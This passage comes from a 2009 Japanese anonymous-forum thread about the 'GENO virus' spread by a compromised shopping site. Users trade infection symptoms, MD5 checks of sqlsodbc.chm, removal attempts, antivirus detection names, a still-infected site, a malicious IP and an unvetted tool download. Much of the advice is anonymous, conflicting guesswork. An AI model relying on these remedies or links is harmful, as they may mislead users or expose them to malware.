そもそもsqlsodbc.chmが全ローカルディスクに検索かけても見つからなかった
システムも全て表示させているのに

254 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:32:37
>251
感染経路ははっきりしてるのか
とりあえずバックアップ取って再インスコしてみる

255 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:32:53
>>249
ありがとう。こうなった。
f639afde02547603a3d3930ee4bf8c12

256 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:33:51
>>255
djb

257 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:34:44
>>244
DでOS起動しなけりゃ無問題。だと思う

258 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:34:54
>>255
>>191
>F639AFDE02547603A3D3930EE4BF8C12

おkおk

259 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:35:19
>>255
セーフ。

260 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:36:10
>>256
d 駄目
j じゃん
b バカ

かな?

261 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:36:41
---まとめ2---
感染経路は>>1

感染確認方法は>>191
「sqlsodbc.chm」はsystem32にある。
MD5の確認方法は>>249
ComboFixのダウンロードリンクは場合によってはアンチウイルスに引っかかるが
これは問題なし。危険な人は"取り消されたアクション"になるか、"ページが真っ白"

駆除方法は現状なしと思ったほうが安全、つまりリカバリー
ただ>>162のようなケースも

とにかく
・感染したらリカバリー
・感染確認は>>191でMD5のとり方は>>249のソフトで右クリックから

262 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:37:30
>246
プニルって、
JSについて何か有利な点あるの?


263 :261:2009/04/09(木) 01:39:52
補足、
sqlsodbc.chmの探し方
スタート→検索→ファイルとフォルダすべて→ファイル名の一部の所に
sqlsodbc.chmと入れる→探す場所を"参照..."にしてマイコンピューターから
Windows、System32を選択
これで探してみる

264 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:48:16
リカバリしたくないし、変な動きは無いしとりあえずアンチウイルスで駆除出来るまで放置しよう

265 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:50:44
>>252
これ凄いね。

一昨日見慣れないエラーが出たりプニルがフリーズしたんだよね…
次の日PC起動したらブルースクリーン。
ネットに繋いだらZAがjquery.jsをブロック。
>191のサイトが表示されない。
CPU使用率が高い。これ怪しいよなぁ…
低価格PCスレかグーグルの検索結果から感染したかもしれない

266 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:55:24
>>241
undonut+modで通常はJavaScriptは切っておいて
信頼できるサイトだけ「URL別セキュリティ」ONにしてる。
でも今回みたいなことだと、どうしようもない罠。

267 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:56:46
>>265
>>191って実行ファイルがダウンロードできるか出来ないか,じゃないの?

268 :名無しさん@お腹いっぱい。:2009/04/09(木) 01:57:28
>>265
hashTabで調子にのって各種ハッシュを無駄にわんさか算出するようにして使うと
ちょっと大きなファイルの算出を行う際にとんでもなく重くなって時間が掛かるのがアレだけど、
使い勝手は良いよ。お勧め。

ちなみにZAで遮断されたところで、それなりにjsを読み込んでいる筈で、
恐らくオンタイムでウィルスが動作しちゃってる筈だから
CPU使用率が高い時点で既に食らった物と見て覚悟を決めた方がいいと思うよ。

269 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:00:44
>>267
最近のマルウェアは自身を駆除されないために有用な駆除ツールのダウンロードをブロックする
このGENOウイルスもそうするようで
サーバーの混雑とかじゃないのにダウンロード出来ない人(ページが表示されない人)はヤバいかもね


270 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:12:17
432 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/09(木) 01:55:40
俺もGENOウィルスに感染したが、とりあえず元凶のウィルス本体は削除できたので報告。

まずa-squaredで検査。C:\Windows直下に変な名前のファイル(gluogug.gyd)が出来てる。
これがTROJAN-SPY.AGENT!IKと警告される。これは削除しても何遍でも復活する。
セーフモードやUbuntu起動CDから削除を試みたがそれでもダメ。

某スレで報告のあった、BART'sPEというソフトで起動CDを作成しCDから起動。
ファイルマネージャでC:\Windows内のウィルス本体ファイルを削除する。(その際フリーズするかも)
暫くしてそのまま再起動。今度はC:\RECYCLER内に先ほどのウィルス本体がリネームされて移動してるので
再度削除する。

これで、取りあえずGENOウィルス感染中に起きた異常は収まった。
(※WindowsUpdate不能、Regedit.exe使用不能、ブラウザの頻繁な異常終了、スタートアップ登録アプリの不起動等)

俺は比較的軽い症状だったので、あまり参考にならないかも試練が・・・


271 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:14:51
いいか、みんな

        (゚д゚ )
        (| y |)


GENOと再度(cide)では単なる文字列だが

     GENO ( ゚д゚) cide
       \/| y |\/


2つ合わされば最強のウイルスサイトへと変化する

 ( ゚д゚) Genocide(ジェノサイド=大量虐殺、集団殺戮)
 (\/\/

272 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:15:34
>>268
覚悟は決めたけど再インストールは避けたいな…

プニルを起動してるときはプニルのCPU使用率が100パーセント近かった。
プニルを終了したらMsMpEng.exeが動き出してCPU使用率50〜80パーセントくらい。
…今↑を書いたらMsMpEng.exeの動きが止まった。怖えー
変わりにSystem Idle Processの使用率が100パーセントになった。
なんだこれ?

273 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:16:50
これからビクビクしてずっと過ごすのは辛いよ

274 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:17:30
>System Idle Processの使用率が100パーセント
これ正常

275 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:18:10
System Idle Processってそんなもんだよね

276 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:18:59
>>274
そうなんだw
たしかにCPU使用率はMsMpEng.exeが止まってから正常化してる。

277 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:19:45
>>270
こんなダルいことやるなら>>162やるだろ
逆アセンブラして調べたり
動的解析で調べた上での駆除出来た宣言ならまだいいがそうじゃないだろうな

278 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:19:53
>272

それはマイクロソフト謹製のウィルスみたいなスパイウェア対策ツール

そんな物既に捨てたよ

279 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:26:59
サイト上のjsが読み込まれた時点でAdobe Readerが起動、
バッファオーバーフローの脆弱性を狙ってpdfファイル内に埋め込まれたスクリプトが実行される。
(Readerの設定でスクリプトの実行を切っていれば被害を受けない。)
ここまでは最新版のAdobe Readerでも同じっぽい。

Readerが最新版でなければこの段階でクリーンインストール推奨。
最新版の場合、被害があるのかないのかってのがよくわからない。
致命的なことにはならないと思うんだけど。

280 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:27:42
>>277
今このスレに足りないのはプログラマだと思う。。。

ウィルスのEXEファイルを逆アセンブルしてソースを解読すれば
少なくてもEXEファイルで何をやってるのかまでは掌握出来るんだし。

281 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:28:11
しかしID出ないセキュ板は使いにくいな
誰が誰やらわからんから安価誤爆も出てるし
情報の集約はID出る板の方がいいんじゃないか?

282 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:28:16
>>278
危険度がまだ分類されてない〜のオプションをオンにすればいいんだよ
ソフトウェアエクスプローラもあるし最悪の事態は回避できる

283 : ◆W07s5cWHb. :2009/04/09(木) 02:31:30
>>281
ホントはそうなんだよね。ID欲しい。
ぶっちゃけ、トリップ付けてレスつければ良い話って事でもあるんだけどさ。

284 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:33:49
>>281
自作板に関連スレが立ってたはず

285 :名無しさん@お腹いっぱい。:2009/04/09(木) 02:33:53
>>277

>>270の元カキ子したの俺だけど、確かに>>162の方がスマートだよね。
しかし、書き忘れてたが俺の場合、感染中はウィルスに邪魔されてComboFixをダウンロードすることもできなかった。
で、ウィルス本体を削除したあと、今しがたComboFixを落として念のためチェックしてみたところ。

286 :名無しさん@お腹いっぱい。:2009/04/09(木) 03:07:52
対策のまとめまだ〜

287 :名無しさん@お腹いっぱい。:2009/04/09(木) 03:13:02
ウイルスがどの程度の繁殖力があるのか判らんから怖いなぁ。
マルチブートでパーティションが10くらい有るけど感染したところだけ
バックアップイメージから復元してしてとりあえず様子見orz
ディスクのどこかに潜むたちの悪いタイプじゃなければ良いんだが。

288 :名無しさん@お腹いっぱい。:2009/04/09(木) 04:04:28
AVソフトの対応した早さってわかる?

一番速かったところのAVソフト使いたいんだけど

289 :名無しさん@お腹いっぱい。:2009/04/09(木) 04:09:13
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
http://pc11.2ch.net/test/read.cgi/jisaku/1239183817/l50


290 : ◆W07s5cWHb. :2009/04/09(木) 04:12:13
>>288
私の記憶が正しければ対応一番乗りはマカフィーだったような。。。

291 :名無しさん@お腹いっぱい。:2009/04/09(木) 04:44:18
>>223
同じく
こっちは2008だけど

292 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:05:52
通販サイト「GENO」の改ざん、広告掲載サイトにも影響
http://www.security-next.com/010250.html

通信販売サイト「GENO」が不正アクセスにより改ざんされた問題で、
同社広告を表示したメディアなどに影響が出ている。
アイティメディアでは、一部サイトにおいて4月1日より広告を掲載していたが、広告のリンク先が改ざんされ、
閲覧者にFlashやAdobe Readerにおける既知の脆弱性を攻撃するウイルスに感染するおそれがあったことから、
4月6日13時に広告掲載を停止したという。
最新版のウイルス対策ソフトなどを利用している場合、検知される可能性が高いが、
アイティメディアでは問題の期間に広告を閲覧したユーザーに対し、
ウイルス感染の有無を確認するよう呼びかけている。

アイティメディア
http://corp.itmedia.co.jp/
GENO
http://www.geno.co.jp/

293 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:07:00
自分はXP SP3で、4/7朝にGENOに行ったんだが現在まで感染の兆候が無い。
なんか気持ち悪いなあ、と思っていたんだが、VB2009のログを見て判った。

FWが動作してないのは昨日確認してたんだが、なんと、「フィッシング詐欺対策」で
94.247.2.195への接続を蹴りまくってくれてた。なんでも、「Web上の脅威」なんだと。

こうした、回避例もあった方が良いかと思って報告。

294 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:07:42
広告主とのなんという差www

295 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:20:54
jquery.js検出 4/5 0:00頃

●a-squared     4.0.0.101
 2009.04.03 Trojan-Spy.Agent!IK
●Avast       4.8.1335.0
 2009.04.03 Win32:Daonol-L
●eSafe       7.0.17.0
 2009.04.02 Suspicious File
●GData       19
 2009.04.03 Win32:KillAV-KS
●Ikarus    T3.1.1.49.0
 2009.04.03 Trojan-Spy.Agent
●Kaspersky     7.0.0.125
 2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
 2009.04.03 Generic!Artemis
●Prevx1      V2
 2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
 2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
 2009.04.03 PAK_Generic.001

296 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:22:18
*.exe検出 4/7 0:00頃

●McAfee 5576
 2009.04.06 Generic Dropper.ef(GmL.exe La.exe)
●McAfee+Artemis 5576
 2009.04.06 Generic Dropper.ef(GmL.exe)
●eSafe 7.0.17.0
 2009.04.06 Suspicious File(La.exe)
●Prevx1 V2
 2009.04.06 High Risk Cloaked Malware(GmL.exe La.exe)
●Symantec 1.4.4.12
 2009.04.06 Trojan.Dropper(GmL.exe La.exe)
●TrendMicro 8.700.0.1004
 2009.04.06 PAK_Generic.001(GmL.exe La.exe)

297 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:24:51
これもうリカバリするしかないですか?

298 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:25:13
>>295-296
乙です。

299 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:26:54
※TrendMicroは圧縮ファイル指摘で検出ではない

300 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:31:41
>>293
今フィッシング詐欺対策のログ見てきたら
4/7昼に94.247.2.195蹴ってくれてた
バスター見直した

301 :名無しさん@お腹いっぱい。:2009/04/09(木) 05:45:52
>>297
サーバーのウィルス感染や個人情報の流失はございません。
旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。

http://www.geno.co.jp/webshop/okyakusama.html
http://www.geno.co.jp/recruit/job_01.jpg

302 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:39:45
Bart'PEでウィルスを削除⇒正常なファイルに置き換え⇒常駐プログラムの削除
(レジストリのハイブを読み込んで修正)でどうにかナンねェか、これ?

303 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:44:42
感染中はSP+メーカーの統合が動かない(CMD.exeの動作不良に起因)ので、他パーティションのVista起動して
そっちでSP統合済みDVDを作ってからXP入れなおししたよ。

304 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:47:36
GENOウイルスの専門掲示板建てました
情報提供にご協力願います。


GENOウイルス被害者の会
http://yy701.60.kg/genovirus/

305 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:54:17
素性のわからんやつの作った板には行きにくい
管理者はhusianasanでもしてくれ

306 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:55:08
確かに迂闊に踏めないから困るw

307 :名無しさん@お腹いっぱい。:2009/04/09(木) 06:59:33
取り敢えず役立ちそうなものをまとめてUP。
http://www1.axfc.net/uploader/O/so/79648.zip
Size/40.4MB
MD5/813785CE59E7026893BFF5726193104B

 内容/
 ・Adobe Reader ver.9.1(要更新)
 ・Adobe Flash Player ver.10.0.22.87 for FireFox(要更新/FireFoxのみ)
 ・HashTab Windows Shell Extension ver.2.3(ハッシュ確認)
 ・MD5 Checker ver.1.03b(ハッシュ確認)
 ・Combofix(マルウェア削除 USEフォルダ内に使用方法あり、使用は要注意)
 ・激動たる俺RegEdit改 ver.1.2.0.0(レジストリエディタ regeditが起動しないユーザ用)


あと、感染環境下だとcmdが動かないみたいだけどcommandは起動できる?

308 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:02:31
GENOウイルスの専門掲示板建てました
情報提供にご協力願います。


GENOウイルス被害者の会
http://yy701.60.kg/genovirus/

309 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:03:55
>>308
危なくて踏めねーよ

310 :husianasan:2009/04/09(木) 07:08:56
GENOウイルス被害者の会は釣りじゃないです

311 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:10:35
GENOウイルスの専門掲示板建てました
情報提供にご協力願います。


GENOウイルス被害者の会
http://yy701.60.kg/genovirus/

312 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:12:12
ミスッタorz

GENOウイルス被害者の会は釣りではありません
安全なので安心してください。



被害者が多ければ集団訴訟なんかできないかと思っています。
かなり難しい戦いになると思いますが。

メールや電話でGENOに報告された方おられましたらご連絡ください。

313 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:13:37
なんか怪しいURLだなw Noscript対応FireFoxで見てみたけど、もうちょっと
スレの内容を反映させて「使える」コンテンツにしてくれよ。あれじゃどうしようもない。

314 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:13:46
            /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   キャッシュ削除すりゃぁいいんだよ!!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /

315 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:17:58
フシアナサンできないorz

>>313
自分も感染しているので、スレと照らし合わせて
とりあえず経験上の確定要素のみ書き込んでいます。

色々書きたいのですが、間違っていたら
迷惑を掛けてしまうので、、、

316 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:19:30
感染してるPCから立てたんじゃないだろうな?w

317 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:20:28
XPSP3で全部最新だったが踏んだあとに
デフラグしてもCドライブが真っ赤な状態がおさまらなかった。
他に思い当たる原因がないんだよなぁ ウィルススキャンもデフラグも頻繁にしてるし
リカバリしたら直ったし



318 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:22:16
>>315
>>316

ftpでバシバシファイル送受信してwebサイト作ってくれw

319 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:23:50
>>316
感染してるPCはブラウザが死に掛けで使い物にならないので
未感染のノートPC使っています。

掲示板はレンタルサーバーの物でメルアド一つで作成できるタイプですので
ウイルス汚染の心配はありません。

320 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:24:00
>>317
スタートボタン⇒ファイル名を指定して実行 でcmdとかregeditは正常に動くの?

321 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:25:24
>>319
内容を充実させてくれ〜

322 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:26:34
>>9
PCがおかしくなったんだけどどうやってなおせばいい?orz

323 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:26:52
>>319
5・6人集まったらmixiあたりでコミュニティでも作れば?
無料掲示板よかましだろ

324 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:29:05
>>322
そういう質問がでる時点でリカバリかと
必要なファイルのバックアップとってOSインスコし直しなさいな

325 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:38:52
>>323
多くの情報が欲しいのと、
荒らし、アンチ(社員)排除のために、自分で規制を発動できる
レンタル掲示板にしました。

326 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:40:39
>>322
   ___
  |___ミ⌒ヽペタン
    |  ⌒)ノ ペタン
 ._ノ )   ((
 | .・∀|  ( 嘘ヽ
 |__|  | ̄ ̄ ̄|
  /  > . |     |
""""""""""""""""""""

327 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:42:30
>>322
感染してから対策したって意味ないぞw

328 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:45:40
husianasan hじゃなくてfだぞ

329 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:49:04
こういうときマカはさびしいよな
ウィルスに縁がなす
祭りのみんながうらやましい

330 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:52:18
>>329
GENOでWin機買えば今ならセットです。

331 :名無しさん@お腹いっぱい。:2009/04/09(木) 07:55:29
>>326
unable to launch application. please restart your computer try again. error code: ー2147023174

って出てネットにもつながらんw
携帯から打ってる。
再インスコするわ

332 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:03:58
>>330
なんかすごくお得そうで欲しくなる不思議さw

333 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:07:50
>>332
あなたもこの機会に如何ですか?
今なら、GENOウイルスもフルセットで付いてきます。

334 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:20:04
スタッフA
「Webサイトの改ざんによるウイルス感染など普通にパソコンを使用しているだけでも、
ウイルスに感染してしまうという事例が増えています」

スタッフB
「ウイルスの感染を未然に防ぐためにも、最新のセキュリティソフトを使用し、
ウイルス定義データベースを常に最新に保つことが、安全なPC使用の第一歩です」

スタッフC
「ただいま、通販ショップGENOでは、総合セキュリティソフト各種を好評取り扱い中!
PCパーツご購入の際にご一緒にいかがですか?」

http://www.geno.co.jp/recruit/job_01.jpg

335 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:26:56
最近PCが重い!

├ 1.ウィルスを駆除する
│                              
│    [まちがい]                         
│      安上がりな方法ではありますが、対応していない場合もあるのが難点です。
│      それよりも別の手段を探してみませんか?
│      もっと確実な方法があるかも?
│              ↑
│          ココがポイント!

└ 2.GENOで新しいPCを買う

      [せいかい]

web通販ショップ GENO
ttp://www.geno.co.jp/webshop/okyakusama.html


336 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:34:13
概要>>1,51
la.exeがsqlsodbc.chmを書換>>60
sqlsodbc.chm?>>47-49
chm脆弱性>>52,65
sqlsodbc.chmの確認>>84,144,159,168,181
ComboFixで駆除例>>162
まとめ>>191,261
メモリ上のプロセスが書換られる>>71-72,79
感染経路?海外での感染例>>80,82
役立ちファイルまとめ>>307
結論>>314







337 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:35:10
右クリックが使い物になりません。。。

ファイルやフォルダにカーソル当てて右クリックすると
確実にエクスプローラーが落ちます。

ノートン先生の起動もブロックされてるようだし
これは 死 亡 確 認 でよろしいでしょうかw

338 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:35:32
踏んでしまったようなのですが、
気になって最初にカスペルオンラインで調べたところ、
Trojan-Downloader.JS.Agent.dwfが検知されました。
ただ、インターネットの一時ファイルを削除したら検知されなくなりました。
AdobeReader/Flash共に最新版ですし、
sqlsodbc.chmのハッシュ値も>>84の通り。
挙動も問題なく再起動も可能です。

これって安心して良いのでしょうか?
最初にカスペルオンラインで検知されたのが気になるんですが…


339 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:37:53
安心したければ、クリーンインストールしかない

340 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:37:54
まだやってたのか

341 :名無しさん@お腹いっぱい。:2009/04/09(木) 08:40:16
>>338
>>279

現段階では安心とは言えない

342 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:27:37
ハッシュが正規のものと完全一致してれば間違いなく感染してないってことでFA?

343 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:28:28
あくまで一つの確認法だとおもわれ

344 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:40:00
質問。
閲覧して感染した場合、PC内のデータその物も感染してヤバいですかね?
ROMに焼いて他に移すとかもダメ?

最悪データを全部廃棄の形でクリーンインストするしかないのかな…?

345 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:42:18
>>343
特に問題も起きてないようなんで、とりあえず安心しておくことにしますわ
ただ、ここからは目を離せないなぁ

346 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:46:05
>>336
La.exeの書き換えは違うぞ。
La.exeはGENOウイルスと独立したもの。
La.exe、GENOウイルスは同じウイルスだがsqlsodbc.chmを書き換えるのはTEMPに作成される
explore.exe、または○○○.exeだと思われ(多分La.exeもexplorer.exeだと思う)

347 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:48:12
そもそもsqlsodbc.chmがwindows直下に見当たらない自分はアウト?

348 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:49:01
>>347
system32直下では?

349 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:49:16
C:\WINDOWS\system32の下だよ

350 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:50:10
サンクス>>348-349
ちょっと確認しみてる

351 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:51:52
あった
f639afde02547603a3d3930ee4bf8c12
一応安心した

352 :名無しさん@お腹いっぱい。:2009/04/09(木) 09:53:38
ちなみにAVGの有料版は対応してる

353 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:02:57
そんな手間掛けなくてもnrtstatコマンドで感染してるか簡単に調べられるだろ

354 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:04:07
>>353
それやっちゃだめ 地雷が発動するから

355 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:05:20
>>353
netstatな

356 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:06:01
ニュー速で同じことを書いてる人が

357 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:07:39
某掲示板でAMD64のCPUなら大丈夫と書かれてたのですが
本当ですか?

358 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:08:56
>>356
まあ同時進行みたいなもんだからね。
俺はニュー速アク禁になってるからこっちだけ書いてる。

359 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:16:40
>>344だが誰か分かる人いない?

360 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:19:17
>>357
おれX2 3800+で感染したよorz

361 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:19:45
>>359
モノによるだろうから、例をあげれば答えやすいと思う。
アプリなら全て入れなおした方がいい。

おれもあまり詳しくない、スマソ

362 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:19:59
なんか思っていたよりもタチの悪いウイルスっぽいな。
キャッシュ削除で解決とかアリエナス。
間違った対処法を掲載して感染拡大させてるGENOは本当に酷いな

363 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:20:39
crestronjapan.comで感染を試みる(未だ有害)
Flashのバージョン10.0.22.87
Adobe Readerなしの環境→感染せず

Flashのバージョン10.0.22.87
Adobe Reader7環境→感染

Flashのバージョン10.0.22.87
Adobe Reader9→感染せず

つまり最新のAdobe Reader9なら感染しない




364 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:21:23
>>360
ギャフン!

365 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:21:31
>>359
ROMに焼いたデータは他のPCでチェックしてから移せば良いじゃん。
チェックは、このスレや他のGENO関連スレで挙がってる複数のソフトでやった方がいいと思う。

366 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:22:44
>>359
感染したPCにUSBメモリを挿した瞬間USBメモリ自体に感染してしまう
可能性も無きにしも非ずなので、試して見ないとわかりませんが、
自分は他のPCまで感染させるわけにいかないので、試せません

367 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:24:54
>>359
このウイルスはPE型ウイルス、ファイル感染型ウイルスではないので
バックアップは問題なし、またAutoRun系の機能もないです。

368 :359:2009/04/09(木) 10:29:32
うを!?色々と書き込みが(大汗
レスしてくれた人達、本当にありがとうね。感謝。

デジカメ画像なんだけどとりあえずROMに焼いて
数週間経ってからスキャンしてみるよ。
多分その頃には各ベンダーも対応してるかもしれないから。



369 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:30:42
ν速やその他のアホがいい加減な事いったりしてるから
それにだまされる初心者が沢山いそうだな

370 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:31:37
>>357
98002 4400X2 2台環境でリーダーが7フラッシュ最新で感染未遂
pdf開かれたけど再起は問題無し
早々バックアップから復元してんでそれ以外は不明

371 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:31:40
>>346
sorry

372 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:32:37
>>368
引き続きここも継続監視を

373 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:32:58
>>368
それが最善策だと思います

374 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:33:02
>>367
なるほど。安心しますた。
ありがとう〜(T_T)

375 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:38:51
とりあえず、
naxos、GENO公式は現在無害。
crestronjapan.com は未だjquery.jsが存在。
Adobe Readerのバージョンが古いと感染する恐れ>>363

376 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:41:49
>>375
> crestronjapan.com は未だjquery.jsが存在。
放置するんかねw

377 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:44:09
ほぼわかってきたね
・ウイルスの動作
・ウイルスの親玉(まだちょっと?)
・ウイルスの被害
・駆除方法
・今後の対策
・感染していないか確認する方法

ウイルスの親玉らしきものは検体採取済みでセキュ板内の可否スレの
住民が各ベンダーに検体提出してるみたいだし

378 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:49:37
とにかく ,lv ドメインを
ルーターやファイヤーウォールなどで
イン・アウトバウンドともに弾くこと、発症したら何があるかわからん

379 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:51:57
ウイルス自体は結構厄介だけど感染経路は別によくあるパターンだろ
特にFlashの脆弱性含め、Adobe Collab overflowなんて珍しくもなんともない気がするんだけど
これだけ感染広まってるって事はそれだけセキュリティに無頓着なやつが多いんだろうな
このウイルスで初めてpdfでもウイルスに感染すること知ったやついるだろ

今は逆に仮想PCでネットするしかないとか言い始めてるやつも要るけど・・・

380 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:56:20
でっていう

381 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:58:01
>>379
常に正常なサイトだと思っていたサイトが書き換えられてたりする危険は
前からあったしな
セキュリティ系ニュースのスレで情弱が、
あやしいサイトみなけりゃいいじゃん的なレスを散々目にしたがw

382 :名無しさん@お腹いっぱい。:2009/04/09(木) 10:59:11
サイトが乗っ取られるのが一番悪い

383 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:01:29
たいした情報じゃないけど
sqlsodbc.chm
は改変されるんじゃなくて上書きされる

384 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:04:36
PDFとFlashのエクスプロイトコードはアンチウイルスソフトで引っかかるの?

385 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:05:56
Readerのバージョンにふれてる人、マイナーバージョンまで書いてほしいな。
バージョン7、8に関しては脆弱性に対応するアップデート(7.1.1、8.1.4)があるはず。
バージョン9も最新の9.1.0でないとダメなわけだから。

386 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:08:46
会社の感染したPCで sqlsodbc.chm のMD5調べたら
F639AFDE02547603A3D3930EE4BF8C12
ではなかった\(^o^)/

さて感染日時と感染経路を調べてみますわ

387 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:09:38
>>385
古いadobeが7.0.0.0
最新のが9.1.0.163

388 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:10:11
結局、一般で被害受けてるのはみんなXPなん?

俺はPDFとFlashを未対策のままVista+先生で
短縮ふんじゃったけど、特に何もおかしな挙動は
起きてないんだが・・・・。

389 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:10:11
GIZMODE Japan (ギズモードジャパン)GIZMODE japan
ttp://gizmode.blog26.fc2.com/blog-entry-212.html

GENOウイルス情報
4日〜7日までの間にPCショップGENOを観覧された方は
ウイルス感染の可能性があります。

サイトを開くだけでウイルスに感染する凶悪なタイプで
現在、大騒ぎになっております。

心当たりのある方は GENOウイルス被害者の会
で、情報交換しておりますので是非ご覧ください。

390 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:11:51
>>384
検体を入手できてないからわからんが
http://wepawet.iseclab.org/view.php?hash=af28f3bc9424a3da7ff8bc84740bce93&type=js
でpdfの解析結果は出てる

